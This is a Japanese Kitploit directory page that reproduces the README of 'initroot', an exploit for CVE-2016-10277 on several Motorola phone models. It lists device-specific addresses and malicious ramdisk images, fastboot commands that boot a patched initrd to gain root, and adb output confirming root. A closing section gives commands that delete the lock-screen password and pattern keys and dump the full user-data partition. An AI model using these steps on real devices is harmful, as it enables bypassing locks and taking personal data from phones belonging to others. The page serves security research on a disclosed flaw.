Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
initroot — CVE-2016-10277を悪用したSecure Bootおよびデバイスロックのバイパス | Kitploit
ツール/GitHubGitHub/leosol/initroot
Androidセキュリティ認証と認可特権昇格エクスプロイトデータ流出モバイルセキュリティ
GitHubleosol/initroot

initroot

CVE-2016-10277を悪用したSecure Bootおよびデバイスロックのバイパス

リポジトリを見る
537年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2016-10277 の悪用

詳細情報: https://alephsecurity.com/2017/06/07/initroot-moto/

デバイスが脆弱かどうか確認したいだけなら、ストック ramdisk を(変更を加えずに)フラッシュする方が速いかもしれません。 該当する場合は、initroot-*-STOCK*.cpio.gz を探してください。

Motorola XT-1033

  • スクラッチアドレス: 0x11000000
  • パディング: 64MB
  • ストックROMパディング済みramdisk: initroot-xt1033-p64-STOCK.cpio.gz
  • ストックROMパッチ適用済み・パディング済みramdisk: initroot-xt1033-p64-MALICIOUS.cpio.gz

Motorola XT-1040

  • スクラッチアドレス: 0x11000000
  • パディング: 64MB
  • ストックROMパディング済みramdisk: initroot-xt1040-p64-STOCK.cpio.gz
  • ストックROMパッチ適用済み・パディング済みramdisk: initroot-xt1040-p64-MALICIOUS.cpio.gz

Motorola XT-1068

  • スクラッチアドレス: 0x11000000
  • パディング: 64MB
  • ストックROMパディング済みramdisk: initroot-xt1068-p64-STOCK.cpio.gz
  • ストックROMパッチ適用済み・パディング済みramdisk: initroot-xt1068-p64-MALICIOUS.cpio.gz

Motorola XT-1069

  • スクラッチアドレス: 0x11000000
  • パディング: 64MB
  • ストックROMパディング済みramdisk: initroot-xt1069-p64-STOCK.cpio.gz
  • ストックROMパッチ適用済み・パディング済みramdisk: initroot-xt1069-p64-MALICIOUS.cpio.gz

Motorola XT-1078

  • スクラッチアドレス: 0x11000000
  • パディング: 64MB
  • ストックROMパディング済みramdisk: initroot-xt1078-p64-STOCK.cpio.gz
  • ストックROMパッチ適用済み・パディング済みramdisk: initroot-xt1078-p64-MALICIOUS.cpio.gz

Motorola XT-1514

  • スクラッチアドレス: 0x90000000
  • パディング: 64MB
  • ストックROMパディング済みramdisk: initroot-xt1514-p64-STOCK.cpio.gz
  • ストックROMパッチ適用済み・パディング済みramdisk: initroot-xt1514-p64-MALICIOUS.cpio.gz

rootアクセスの実行と確認:

  • フラッシュとブートループの解決:

    root@kitploit:~
    git clone https://github.com/leosol/initroot.git
    cd xt1040 (or any other folder)
    use ./run-malicious.sh, run-stockramfs.sh and solve-bootloop.sh (if you have any bootloop)
    Or use the following commands:
    fastboot flash aleph $FILE_NAME
    fastboot oem config fsg-id "a initrd=SCRATCH+PAD,LENGTH"
    fastboot continue
    #use the following to solve bootloops
    fastboot oem config fsg-id ""
    
  • root権限の確認:

    root@kitploit:~
    root@debian-vaio:~/motoramfs/xt1040# adb devices
    List of devices attached
    * daemon not running. starting it now on port 5037 *
    * daemon started successfully *
    T0092020C5	device
    
    root@debian-vaio:~/motoramfs/xt1040# adb shell
    root@peregrine:/ # getenforce
    >Permissive
    
  • rootで何ができますか?

    root@kitploit:~
    #remove authentication as pointed out by @kraftdenker (tested on xt1068)
    mv /data/system/gatekeeper.password.key /data/system/_gatekeeper.password.key
    mv /data/system/gatekeeper.pattern.key /data/system/_gatekeeper.pattern.key
    
    #dump your data
    adb pull /dev/block/platform/msm_sdcc.1/by-name/userdata
    
    #or make it permanent
    
ツールをダウンロード